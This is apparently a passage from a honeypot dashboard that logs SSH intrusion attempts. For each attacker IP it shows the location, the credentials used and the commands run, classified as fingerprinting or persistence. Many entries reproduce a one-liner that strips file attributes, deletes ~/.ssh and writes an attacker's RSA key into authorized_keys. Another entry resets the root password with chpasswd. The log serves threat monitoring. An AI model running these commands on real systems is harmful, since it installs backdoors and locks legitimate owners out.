/proc/uptime 2>/dev/null); cpus=$(nproc 2>/dev/null || /usr/bin/nproc 2>/dev/null || busybox nproc 2>/dev/null || grep -c "^processor" /proc/cpuinfo 2>/dev/null); cpu_model=$( { grep -m1 -E "model name|Hardware" /proc/cpuinfo 2>/dev/null; lscpu 2>/dev/null | grep "Model name"; dmidecode -s processor-version 2>/dev/null; uname -p 2>/dev/null; busybox uname -p 2>/dev/null; } ); gpu_info=$( (lspci 2>/dev/null | grep -i vga; lspci 2>/dev/null | grep -i nvidia; busybox lspci 2>/dev/null | grep -i vga; busybox lspci 2>/dev/null | grep -i nvidia) 2>/dev/null ); last_output=$(last 2>/dev/null); echo "UNAME:$uname"; echo "ARCH:$arch"; echo "UPTIME:$uptime"; echo "CPUS:$cpus"; echo "CPU_MODEL:$cpu_model"; echo "GPU:$gpu_info"; echo "LAST:$last_output" ร—8
$ export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:$PATH; uname=$(uname -s -v -n -m 2>/dev/null); arch=$(uname -m 2>/dev/null); uptime=$(cat /proc/uptime 2>/dev/null); cpus=$( (nproc 2>/dev/null || /usr/bin/nproc 2>/dev/null || grep -c "^processor" /proc/cpuinfo 2>/dev/null) | head -1); cpu_model=$( (grep -m1 -E "model name|Hardware" /proc/cpuinfo | cut -d: -f2- | sed 's/^ *//;s/ *$//' ; lscpu 2>/dev/null | awk -F: '/Model name/ {gsub(/^ +| +$/,"",$2); print $2; exit}' ; dmidecode -s processor-version 2>/dev/null | head -n1 ; uname -p 2>/dev/null) | awk 'NF{print; exit}' ); gpu_info=$( (lspci 2>/dev/null | grep -i vga; lspci 2>/dev/null | grep -i nvidia) 2>/dev/null | head -n50); cat_help=$( (cat --help 2>&1 | tr '\n' ' ') || cat --help 2>&1); ls_help=$( (ls --help 2>&1 | tr '\n' ' ') || ls --help 2>&1); last_output=$(last 2>/dev/null | head -n 10); echo "UNAME:$uname"; echo "ARCH:$arch"; echo "UPTIME:$uptime"; echo "CPUS:$cpus"; echo "CPU_MODEL:$cpu_model"; echo "GPU:$gpu_info"; echo "CAT_HELP:$cat_help"; echo "LS_HELP:$ls_help"; echo "LAST:$last_output" ร—3
$ uname -m 2 > /dev/null ร—16
$ cat /proc/uptime 2 > /dev/null ร—3
$ export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:$PATH; uname=$(uname -s -v -n -m 2>/dev/null); arch=$(uname -m 2>/dev/null); uptime=$(cat /proc/uptime 2>/dev/null | cut -d. -f1); cpus=$( (nproc 2>/dev/null || /usr/bin/nproc 2>/dev/null || grep -c "^processor" /proc/cpuinfo 2>/dev/null) | head -1); cpu_model=$( (grep -m1 -E "model name|Hardware" /proc/cpuinfo | cut -d: -f2- | sed 's/^ *//;s/ *$//' ; lscpu 2>/dev/null | awk -F: '/Model name/ {gsub(/^ +| +$/,"",$2); print $2; exit}' ; dmidecode -s processor-version 2>/dev/null | head -n1 ; uname -p 2>/dev/null) | awk 'NF{print; exit}' ); gpu_info=$( (lspci 2>/dev/null | grep -i vga; lspci 2>/dev/null | grep -i nvidia) 2>/dev/null | head -n50); cat_help=$( (cat --help 2>&1 | tr '\n' ' ') || cat --help 2>&1); ls_help=$( (ls --help 2>&1 | tr '\n' ' ') || ls --help 2>&1); last_output=$(last 2>/dev/null | head -n 10); echo "UNAME:$uname"; echo "ARCH:$arch"; echo "UPTIME:$uptime"; echo "CPUS:$cpus"; echo "CPU_MODEL:$cpu_model"; echo "GPU:$gpu_info"; echo "CAT_HELP:$cat_help"; echo "LS_HELP:$ls_help"; echo "LAST:$last_output" ร—13
$ cat /proc/uptime 2 > /dev/null | cut -d. -f1 ร—13
๐ŸŽญ hollow_garuda_root (118.99.114.224) โ€” North Jakarta, Indonesia ยท 2 sessions ยท 4 cmds
2026-07-05 06:54 EDT ยท as oracle/11111, oracle/admin123
file attribute tampering โ†’ SSH key persistence
$ cd ~; chattr -ia .ssh; lockr -ia .ssh ร—2
โ†ณ file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ ร—2
โ†ณ SSH key persistence
๐ŸŽญ silent_phantom_root (144.31.156.154) โ€” Helsinki, Finland ยท 1 session ยท 2 cmds
2026-07-05 10:04 EDT ยท as oracle/admin123
file attribute tampering โ†’ SSH key persistence
$ cd ~; chattr -ia .ssh; lockr -ia .ssh
โ†ณ file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~
โ†ณ SSH key persistence
๐ŸŽญ rogue_merlion_root (149.34.253.149) โ€” Singapore, Singapore ยท 1 session ยท 2 cmds
2026-07-05 09:11 EDT ยท as oracle/tft105
file attribute tampering โ†’ SSH key persistence
$ cd ~; chattr -ia .ssh; lockr -ia .ssh
โ†ณ file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~
โ†ณ SSH key persistence
๐ŸŽญ unhinged_pho_root (123.31.20.162) โ€” Hanoi, Vietnam ยท 2 sessions ยท 2 cmds
2026-06-27 04:29 EDT ยท as admin/asdf1234, root/admin123
history snooping โ†’ pwd
$ history | tail -5
โ†ณ history snooping
$ pwd
๐ŸŽญ unhinged_cowboy_root_120 (172.202.9.120) โ€” Des Moines, United States ยท 1 session ยท 2 cmds
2026-07-05 08:46 EDT ยท as oracle/tft105
file attribute tampering โ†’ SSH key persistence
$ cd ~; chattr -ia .ssh; lockr -ia .ssh
โ†ณ file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~
โ†ณ SSH key persistence
๐ŸŽญ silent_dragon_root (123.57.137.86) โ€” Beijing, China ยท 3 sessions ยท 3 cmds
2026-07-05 05:40 EDT ยท as root/admin, root/admin123, root/password
pwd โ†’ history snooping โ†’ ps
$ pwd
$ history | tail -5
โ†ณ history snooping
$ ps aux | head -10
๐ŸŽญ manic_clog_sol (2.57.122.238) โ€” Amsterdam, The Netherlands ยท 161 sessions ยท 161 cmds
2026-05-07 15:21 EDT ยท as eth/eth, firedancer/firedancer, raydium/raydium
Ran uname 279x across 279 sessions โ€” automated OS fingerprinting.
$ /bin/./uname -s -v -n -r -m ร—161
โ†ณ obfuscated system check
๐ŸŽญ rabid_phantom_sol (41.204.82.238) โ€” Yaoundรฉ, Cameroon ยท 2 sessions ยท 4 cmds
2026-06-16 15:01 EDT ยท as oracle/1234qwer, oracle/oracle01
file attribute tampering โ†’ SSH key persistence
$ cd ~; chattr -ia .ssh; lockr -ia .ssh ร—2
โ†ณ file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ ร—2
โ†ณ SSH key persistence
๐ŸŽญ haywire_durian_sol (34.124.225.147) โ€” Singapore, Singapore ยท 1 session ยท 2 cmds
2026-07-05 04:56 EDT ยท as oracle/1234qwer
file attribute tampering โ†’ SSH key persistence
$ cd ~; chattr -ia .ssh; lockr -ia .ssh
โ†ณ file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~
โ†ณ SSH key persistence
๐ŸŽญ frantic_tiger_sol (209.38.121.186) โ€” Bengaluru, India ยท 1 session ยท 2 cmds
2026-07-05 04:54 EDT ยท as oracle/1234qwer
file attribute tampering โ†’ SSH key persistence
$ cd ~; chattr -ia .ssh; lockr -ia .ssh
โ†ณ file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~
โ†ณ SSH key persistence
๐ŸŽญ weary_monsoon_sol (103.182.132.154) โ€” Delhi, India ยท 1 session ยท 2 cmds
2026-07-05 04:51 EDT ยท as oracle/1234qwer
file attribute tampering โ†’ SSH key persistence
$ cd ~; chattr -ia .ssh; lockr -ia .ssh
โ†ณ file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~
โ†ณ SSH key persistence
๐ŸŽญ placid_lotus_root (125.212.217.143) โ€” Hanoi, Vietnam ยท 36 sessions ยท 36 cmds
2026-06-17 19:51 EDT ยท as admin/123456, admin/admin, admin/password
echo (repeated echo 3x)
$ echo "root:sinko@" | chpasswd ร—36
๐ŸŽญ grumpy_peak_sol (154.221.28.214) โ€” Chai Wan, Hong Kong ยท 1 session ยท 2 cmds
2026-07-05 04:51 EDT ยท as oracle/1234qwer
file attribute tampering โ†’ SSH key persistence
$ cd ~; chattr -ia .ssh; lockr -ia .ssh
โ†ณ file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~
โ†ณ SSH key persistence
๐ŸŽญ stoic_drifter_sol (154.116.254.157) โ€” Luanda, Angola ยท 2 sessions ยท 4 cmds
2026-07-05 04:49 EDT ยท as oracle/1234qwer
file attribute tampering โ†’ SSH key persistence
$ cd ~; chattr -ia .ssh; lockr -ia .ssh ร—2
โ†ณ file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ ร—2
โ†ณ SSH key persistence
๐ŸŽญ frantic_mekong_sol (157.66.26.151) โ€” Go Vap, Vietnam ยท 1 session ยท 2 cmds
2026-07-05 04:50 EDT ยท as oracle/1234qwer
file attribute tampering โ†’ SSH key persistence
$ cd ~; chattr -ia .ssh; lockr -ia .ssh
โ†ณ file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~
โ†ณ SSH key persistence
๐ŸŽญ scrappy_taco_sol (38.94.97.3) โ€” Mexico City, Mexico ยท 1 session ยท 2 cmds
2026-07-05 04:49 EDT ยท as oracle/1234qwer
file attribute tampering โ†’ SSH key persistence
$ cd ~; chattr -ia .ssh; lockr -ia .ssh
โ†ณ file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~
โ†ณ SSH key persistence
๐ŸŽญ ironclad_samba_sol (170.0.62.165) โ€” Surubim, Brazil ยท 1 session ยท 2 cmds
2026-07-05 04:49 EDT ยท as oracle/1234qwer
file attribute tampering โ†’ SSH key persistence
$ cd ~; chattr -ia .ssh; lockr -ia .ssh
โ†ณ file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~
โ†ณ SSH key persistence
๐ŸŽญ placid_acai_sol (191.253.105.84) โ€” Blumenau, Brazil ยท 1 session ยท 2 cmds
2026-07-05 04:48 EDT ยท as oracle/1234qwer
file attribute tampering โ†’ SSH key persistence
$ cd ~; chattr -ia .ssh; lockr -ia .ssh
โ†ณ file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~
โ†ณ SSH key persistence
๐ŸŽญ wily_acai_sol (177.11.196.79) โ€” Feliz, Brazil ยท 2 sessions ยท 4 cmds
2026-07-03 11:34 EDT ยท as oracle/1234qwer, oracle/Oracle12#$
file attribute tampering โ†’ SSH key persistence
$ cd ~; chattr -ia .ssh; lockr -ia .ssh ร—2
โ†ณ file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ ร—2
โ†ณ SSH key persistence
๐ŸŽญ midnight_seoul_sol (211.178.247.182) โ€” Gwangmyeong, South Korea ยท 1 session ยท 2 cmds
2026-07-05 04:47 EDT ยท as oracle/1234qwer
file attribute tampering โ†’ SSH key persistence
$ cd ~; chattr -ia .ssh; lockr -ia .ssh
โ†ณ file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~
โ†ณ SSH key persistence
๐ŸŽญ zealous_phantom_sol (186.103.169.12) โ€” San Bernardo, Chile ยท 1 session ยท 2 cmds
2026-07-05 04:46 EDT ยท as oracle/1234qwer
file attribute tampering โ†’ SSH key persistence (repeated file attribute tampering 3x)
$ cd ~; chattr -ia .ssh; lockr -ia .ssh
โ†ณ file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~
โ†ณ SSH key persistence
๐ŸŽญ rusty_monsoon_sol (122.168.194.41) โ€” Rฤipur, India ยท 1 session ยท 2 cmds
2026-07-05 04:45 EDT ยท as oracle/1234qwer
file attribute tampering โ†’ SSH key persistence
$ cd ~; chattr -ia .ssh; lockr -ia .ssh
โ†ณ file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~
โ†ณ SSH key persistence
๐ŸŽญ rabid_bibimbap_sol (112.151.178.49) โ€” Seocho-gu, South Korea ยท 1 session ยท 2 cmds
2026-07-05 04:44 EDT ยท as oracle/1234qwer
file attribute tampering โ†’ SSH key persistence
$ cd ~; chattr -ia .ssh; lockr -ia .ssh
โ†ณ file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~
โ†ณ SSH key persistence
๐ŸŽญ drowsy_tiger_sol (45.194.3.128) โ€” Noida, India ยท 1 session ยท 2 cmds
2026-07-05 04:42 EDT ยท as oracle/1234qwer
file attribute tampering โ†’ SSH key persistence
$ cd ~; chattr -ia .ssh; lockr -ia .ssh
โ†ณ file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~
โ†ณ SSH key persistence
๐ŸŽญ silent_burger_sol (4.157.250.195) โ€” Boydton, United States ยท 1 session ยท 20 cmds
2026-07-05 04:41 EDT ยท as oracle/1234qwer
cd ~; chattr -ia .ssh; lockr -ia .ssh โ†’ cd ~ && rm -rf .ssh && mkdir .ssh โ†’ echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7Vv" โ†’ cat /proc/cpuinfo | grep name | wc
$ cd ~; chattr -ia .ssh; lockr -ia .ssh
โ†ณ file attribute tampering
